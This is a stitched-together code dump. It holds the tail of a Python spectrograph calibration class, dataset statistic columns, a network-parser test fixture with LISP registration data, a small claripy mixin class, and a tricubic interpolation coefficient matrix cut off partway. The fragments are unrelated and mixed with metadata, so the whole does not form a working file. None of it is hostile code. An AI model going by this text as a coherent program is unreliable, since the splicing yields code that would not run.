10: np.array([-0.0000001630, +0.0003023356, +1.8355214070]),
14: np.array([+0.0000006373, -0.0022195328, +3.4337657140]),
16: np.array([+0.0000000959, +0.0007723205, +1.3240275178]) }
}
}
self.ips_loosemount_pars = { 'H':{
'A':{
6: np.array([-0.0000016233, +0.0020134037, +3.3487332787]),
13: np.array([-0.0000016702, +0.0011352918, +3.1532836476]),
14: np.array([-0.0000007901, +0.0014705165, +2.5939805593]),
16: np.array([-0.0000014554, +0.0032034428, +1.4193023750]),
21: np.array([-0.0000013562, +0.0024241969, +1.7204152786]),
22: np.array([-0.0000015438, +0.0032647489, +1.1711140400]),
2: np.array([-0.0000007673, +0.0011908119, +3.5574747235]),
3: np.array([-0.0000004539, +0.0000711467, +3.7569496247]),
4: np.array([-0.0000017014, +0.0022235883, +3.3469057729]),
20: np.array([-0.0000011548, +0.0024159347, +1.4899767054])},
'B':{
6: np.array([-0.0000017564, +0.0020515363, +4.0061364082]),
13: np.array([-0.0000020047, +0.0015672027, +3.4707598384]),
14: np.array([-0.0000008056, +0.0012756590, +3.2498824876]),
16: np.array([-0.0000013302, +0.0026174646, +2.2733250373]),
21: np.array([-0.0000015477, +0.0028004919, +1.8687160412]),
22: np.array([-0.0000018236, +0.0037493865, +1.2926912294]),
2: np.array([-0.0000009144, +0.0012463162, +4.2410289004]),
3: np.array([-0.0000005587, +0.0001065024, +4.3728963431]),
4: np.array([-0.0000021505, +0.0029466667, +3.6128512030]),
20: np.array([-0.0000014158, +0.0027485459, +1.7502302932])}
},
'K':{
'A':{
3: np.array([+0.0000000000, -0.0032224396, +5.8539233388]),
4: np.array([+0.0000009369, -0.0042696048, +6.7611052624]),
5: np.array([+0.0000010962, -0.0044543760, +6.7225421397]),
6: np.array([+0.0000003577, -0.0027097128, +5.7789655657]),
2: np.array([+0.0000000173, -0.0019826425, +4.8330715369]),
7: np.array([+0.0000008492, -0.0035313488, +5.9016867272]),
8: np.array([+0.0000010973, -0.0038178120, +5.6832992738]),
10: np.array([+0.0000002443, -0.0017360668, +4.1415859150]),
14: np.array([+0.0000015291, -0.0039022985, +4.6823412563]),
16: np.array([+0.0000003064, -0.0001454813, +2.0998323933]) },
'B':{
3: np.array([+0.0000000000, -0.0033096773, +6.6865750935]),
4: np.array([+0.0000004442, -0.0034871860, +7.1654729260]),
5: np.array([+0.0000006937, -0.0038708805, +7.1443293518]),
6: np.array([-0.0000005376, -0.0011557174, +5.8402964783]),
2: np.array([-0.0000001693, -0.0021423525, +5.9778102108]),
7: np.array([+0.0000006778, -0.0035919133, +6.7264063526]),
8: np.array([+0.0000010518, -0.0041659367, +6.6036171357]),
10: np.array([+0.0000000258, -0.0016619486, +4.7519124026]),
14: np.array([-0.0000007761, -0.0001818842, +3.9448840447]),
16: np.array([+0.0000002462, -0.0002856080, +2.5831334692])}
}
}
self.bound_cut_dic ={ 'H':{
6: [425, 200],
10: [250, 150],
11: [600, 150],
#13: [200, 600],
13: [250, 750],
14: [750, 100],
16: [530, 100],
17: [1000,100],
20: [500, 150],
21: [200, 150],
22: [200, 150]},
'K':{
3: [150, 1350],
13: [200, 400],
14: [200, 400]}
}
class orderdict_cla:
def __init__(self,):
self.orderdict = { 'H':{1: [1.79350, 1.81560],
2: [1.77602, 1.79791],
3: [1.75889, 1.78058],
4: [1.74211, 1.76360],
5: [1.72565, 1.74694],
6: [1.70952, 1.73061],
# 7: [1.69811, 1.71032],
# 8: [1.68255, 1.69465],
# 9: [1.66729, 1.67928],
10: [1.64928, 1.66785],
11: [1.63880, 1.65301],
# 12: [1.62320, 1.63487],
13: [1.60548, 1.61957],
14: [1.59742, 1.61061],
# 15: [1.58149, 1.59284],
16: [1.56694, 1.58328],
17: [1.56034, 1.56997],
# 18: [1.54197, 1.55303],
# 19: [1.52926, 1.54022],
20: [1.51677, 1.53096],
21: [1.50060, 1.51902],
22: [1.48857, 1.50682],
# 23: [1.47673, 1.49483],
# 24: [1.46510, 1.48303],
25: [1.45366, 1.47143]},
'K':{1: [2.45317, 2.48280],
2: [2.41999, 2.44928],
3: [2.38771, 2.41667],
4: [2.35630, 2.38493],
5: [2.32573, 2.35402],
6: [2.29596, 2.32393],
7: [2.26696, 2.29461],
8: [2.23870, 2.26603],
# 9: [2.21115, 2.23817],
10: [2.18429, 2.21101],
11: [2.15891, 2.18451],
12: [2.14410, 2.15604],
13: [2.10840, 2.12953],
14: [2.08326, 2.10624],
# 15: [2.05948, 2.08471],
16: [2.03627, 2.06121],
# 17: [2.01358, 2.03825],
# 18: [1.99142, 2.01580],
19: [1.96975, 1.99386],
20: [1.94857, 1.97241],
21: [1.92785, 1.95143],
22: [1.90759, 1.93090],
23: [1.88777, 1.91082],
24: [1.86837, 1.89116],
25: [1.84939, 1.87192]}
}
class tagstuffs:
def __init__(self,night,watm,satm,a0contwave,continuum,ip):
self.a0contwave = a0contwave
self.continuum = continuum
self.watm = watm
self.satm = satm
self.night = night
self.ip = ip
| 69.286863
| 142
| 0.363798
| 2,170
| 25,844
| 4.31106
| 0.221659
| 0.122715
| 0.140246
| 0.015393
| 0.810689
| 0.8
| 0.8
| 0.787173
| 0.787173
| 0.7752
| 0
| 0.522094
| 0.507004
| 25,844
| 372
| 143
| 69.473118
| 0.21215
| 0.028517
| 0
| 0.711712
| 0
| 0
| 0.001355
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.015015
| false
| 0
| 0.003003
| 0
| 0.033033
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
16e053d1824c248dc6a2f044c5bf870a68dc933f
| 2,615
|
py
|
Python
|
src/genie/libs/parser/iosxe/tests/cli/equal/golden_output5_expected.py
|
ykoehler/genieparser
|
b62cf622c3d8eab77c7b69e932c214ed04a2565a
|
[
"Apache-2.0"
] | null | null | null |
src/genie/libs/parser/iosxe/tests/cli/equal/golden_output5_expected.py
|
ykoehler/genieparser
|
b62cf622c3d8eab77c7b69e932c214ed04a2565a
|
[
"Apache-2.0"
] | null | null | null |
src/genie/libs/parser/iosxe/tests/cli/equal/golden_output5_expected.py
|
ykoehler/genieparser
|
b62cf622c3d8eab77c7b69e932c214ed04a2565a
|
[
"Apache-2.0"
] | null | null | null |
expected_output = {
'lisp_id': {
0: {
'site_name': {
'Shire': {
'instance_id': {
4100: {
'eid_prefix': {
'192.168.1.0/24': {
'last_registered': 'never',
'who_last_registered': '--',
'up': 'no'
},
'192.168.1.71/32': {
'last_registered': '00:50:10',
'who_last_registered': '11.11.11.11:33079',
'up': 'yes'
},
'194.168.1.0/24': {
'last_registered': 'never',
'who_last_registered': '--',
'up': 'no'
},
'194.168.1.72/32': {
'last_registered': '00:50:06',
'who_last_registered': '22.22.22.22:27643',
'up': 'yes'
},
'2001:192:168:1::/64': {
'last_registered': 'never',
'who_last_registered': '--',
'up': 'no'
},
'2001:192:168:1::71/128': {
'last_registered': '00:50:10',
'who_last_registered': '11.11.11.11:33079',
'up': 'yes'
},
'2001:194:168:1::/64': {
'last_registered': 'never',
'who_last_registered': '--',
'up': 'no'
},
'2001:194:168:1::72/128': {
'last_registered': '00:50:06',
'who_last_registered': '22.22.22.22:27643',
'up': 'yes'
}
}
}
}
}
}
}
}
}
| 46.696429
| 79
| 0.216444
| 147
| 2,615
| 3.653061
| 0.258503
| 0.417132
| 0.253259
| 0.163873
| 0.789572
| 0.77095
| 0.77095
| 0.77095
| 0.77095
| 0.77095
| 0
| 0.211696
| 0.67304
| 2,615
| 56
| 80
| 46.696429
| 0.416374
| 0
| 0
| 0.428571
| 0
| 0
| 0.236239
| 0.01682
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
bcbfd65032df6b8fb40ce045b04448525639dd27
| 630
|
py
|
Python
|
claripy/frontend_mixins/simplify_helper_mixin.py
|
embg/claripy
|
1a5e0ca61d3f480e541226f103900e983f025e4a
|
[
"BSD-2-Clause"
] | 211
|
2015-08-06T23:25:01.000Z
|
2022-03-26T19:34:49.000Z
|
claripy/frontend_mixins/simplify_helper_mixin.py
|
embg/claripy
|
1a5e0ca61d3f480e541226f103900e983f025e4a
|
[
"BSD-2-Clause"
] | 175
|
2015-09-03T11:09:18.000Z
|
2022-03-09T20:24:33.000Z
|
claripy/frontend_mixins/simplify_helper_mixin.py
|
embg/claripy
|
1a5e0ca61d3f480e541226f103900e983f025e4a
|
[
"BSD-2-Clause"
] | 99
|
2015-08-07T10:30:08.000Z
|
2022-03-26T10:32:09.000Z
|
class SimplifyHelperMixin:
def max(self, *args, **kwargs):
self.simplify()
return super(SimplifyHelperMixin, self).max(*args, **kwargs)
def min(self, *args, **kwargs):
self.simplify()
return super(SimplifyHelperMixin, self).min(*args, **kwargs)
def eval(self, e, n, *args, **kwargs):
if n > 1:
self.simplify()
return super(SimplifyHelperMixin, self).eval(e, n, *args, **kwargs)
def batch_eval(self, e, n, *args, **kwargs):
if n > 1:
self.simplify()
return super(SimplifyHelperMixin, self).batch_eval(e, n, *args, **kwargs)
| 33.157895
| 81
| 0.590476
| 74
| 630
| 5
| 0.22973
| 0.216216
| 0.194595
| 0.248649
| 0.789189
| 0.702703
| 0.702703
| 0.702703
| 0.702703
| 0.378378
| 0
| 0.004264
| 0.255556
| 630
| 18
| 82
| 35
| 0.784648
| 0
| 0
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.266667
| false
| 0
| 0
| 0
| 0.6
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
4c5526805bc2825ad64bb6691eb1554b2dad103f
| 12,582
|
py
|
Python
|
python/coefs.py
|
mustafabar/RedSeaInterpolation
|
5d40cbc6e54df7a867445e8fadd11f9f1cce8556
|
[
"MIT"
] | null | null | null |
python/coefs.py
|
mustafabar/RedSeaInterpolation
|
5d40cbc6e54df7a867445e8fadd11f9f1cce8556
|
[
"MIT"
] | null | null | null |
python/coefs.py
|
mustafabar/RedSeaInterpolation
|
5d40cbc6e54df7a867445e8fadd11f9f1cce8556
|
[
"MIT"
] | null | null | null |
import numpy as np
A = np.array([
[ 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[-3, 3, 0, 0, 0, 0, 0, 0,-2,-1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 2,-2, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-2,-1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2,-2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[-3, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-2, 0,-1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0,-3, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-2, 0,-1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 9,-9,-9, 9, 0, 0, 0, 0, 6, 3,-6,-3, 0, 0, 0, 0, 6,-6, 3,-3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 2, 2, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[-6, 6, 6,-6, 0, 0, 0, 0,-3,-3, 3, 3, 0, 0, 0, 0,-4, 4,-2, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-2,-2,-1,-1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 2, 0,-2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 2, 0,-2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[-6, 6, 6,-6, 0, 0, 0, 0,-4,-2, 4, 2, 0, 0, 0, 0,-3, 3,-3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-2,-1,-2,-1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 4,-4,-4, 4, 0, 0, 0, 0, 2, 2,-2,-2, 0, 0, 0, 0, 2,-2, 2,-2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-2,-1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2,-2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-3, 3, 0, 0, 0, 0, 0, 0,-2,-1, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2,-2, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-3, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-2, 0,-1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-3, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-2, 0,-1, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 9,-9,-9, 9, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 6, 3,-6,-3, 0, 0, 0, 0, 6,-6, 3,-3, 0, 0, 0, 0, 4, 2, 2, 1, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-6, 6, 6,-6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-3,-3, 3, 3, 0, 0, 0, 0,-4, 4,-2, 2, 0, 0, 0, 0,-2,-2,-1,-1, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 0,-2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 0,-2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-6, 6, 6,-6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-4,-2, 4, 2, 0, 0, 0, 0,-3, 3,-3, 3, 0, 0, 0, 0,-2,-1,-2,-1, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4,-4,-4, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 2,-2,-2, 0, 0, 0, 0, 2,-2, 2,-2, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0],
[-3, 0, 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-2, 0, 0, 0,-1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0,-3, 0, 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-2, 0, 0, 0,-1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 9,-9, 0, 0,-9, 9, 0, 0, 6, 3, 0, 0,-6,-3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 6,-6, 0, 0, 3,-3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 2, 0, 0, 2, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[-6, 6, 0, 0, 6,-6, 0, 0,-3,-3, 0, 0, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-4, 4, 0, 0,-2, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-2,-2, 0, 0,-1,-1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-3, 0, 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-2, 0, 0, 0,-1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-3, 0, 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-2, 0, 0, 0,-1, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 9,-9, 0, 0,-9, 9, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 6, 3, 0, 0,-6,-3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 6,-6, 0, 0, 3,-3, 0, 0, 4, 2, 0, 0, 2, 1, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-6, 6, 0, 0, 6,-6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-3,-3, 0, 0, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-4, 4, 0, 0,-2, 2, 0, 0,-2,-2, 0, 0,-1,-1, 0, 0],
[ 9, 0,-9, 0,-9, 0, 9, 0, 0, 0, 0, 0, 0, 0, 0, 0, 6, 0, 3, 0,-6, 0,-3, 0, 6, 0,-6, 0, 3, 0,-3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 2, 0, 2, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 9, 0,-9, 0,-9, 0, 9, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 6, 0, 3, 0,-6, 0,-3, 0, 6, 0,-6, 0, 3, 0,-3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 2, 0, 2, 0, 1, 0],
[-27,27,27,-27,27,-27,-27,27,-18,-9,18, 9,18, 9,-18,-9,-18,18,-9, 9,18,-18, 9,-9,-18,18,18,-18,-9, 9, 9,-9,-12,-6,-6,-3,12, 6, 6, 3,-12,-6,12, 6,-6,-3, 6, 3,-12,12,-6, 6,-6, 6,-3, 3,-8,-4,-4,-2,-4,-2,-2,-1],
[18,-18,-18,18,-18,18,18,-18, 9, 9,-9,-9,-9,-9, 9, 9,12,-12, 6,-6,-12,12,-6, 6,12,-12,-12,12, 6,-6,-6, 6, 6, 6, 3, 3,-6,-6,-3,-3, 6, 6,-6,-6, 3, 3,-3,-3, 8,-8, 4,-4, 4,-4, 2,-2, 4, 4, 2, 2, 2, 2, 1, 1],
[-6, 0, 6, 0, 6, 0,-6, 0, 0, 0, 0, 0, 0, 0, 0, 0,-3, 0,-3, 0, 3, 0, 3, 0,-4, 0, 4, 0,-2, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-2, 0,-2, 0,-1, 0,-1, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0,-6, 0, 6, 0, 6, 0,-6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-3, 0,-3, 0, 3, 0, 3, 0,-4, 0, 4, 0,-2, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0,-2, 0,-2, 0,-1, 0,-1, 0],
[18,-18,-18,18,-18,18,18,-18,12, 6,-12,-6,-12,-6,12, 6, 9,-9, 9,-9,-9, 9,-9, 9,12,-12,-12,12, 6,-6,-6, 6, 6, 3, 6, 3,-6,-3,-6,-3, 8, 4,-8,-4, 4, 2,-4,-2, 6,-6, 6,-6, 3,-3, 3,-3, 4, 2, 4, 2, 2, 1, 2, 1],
[-12,12,12,-12,12,-12,-12,12,-6,-6, 6, 6, 6, 6,-6,-6,-6, 6,-6, 6, 6,-6, 6,-6,-8, 8, 8,-8,-4, 4, 4,-4,-3,-3,-3,-3, 3, 3, 3, 3,-4,-4, 4, 4,-2,-2, 2, 2,-4, 4,-4, 4,-2, 2,-2, 2,-2,-2,-2,-2,-1,-1,-1,-1],
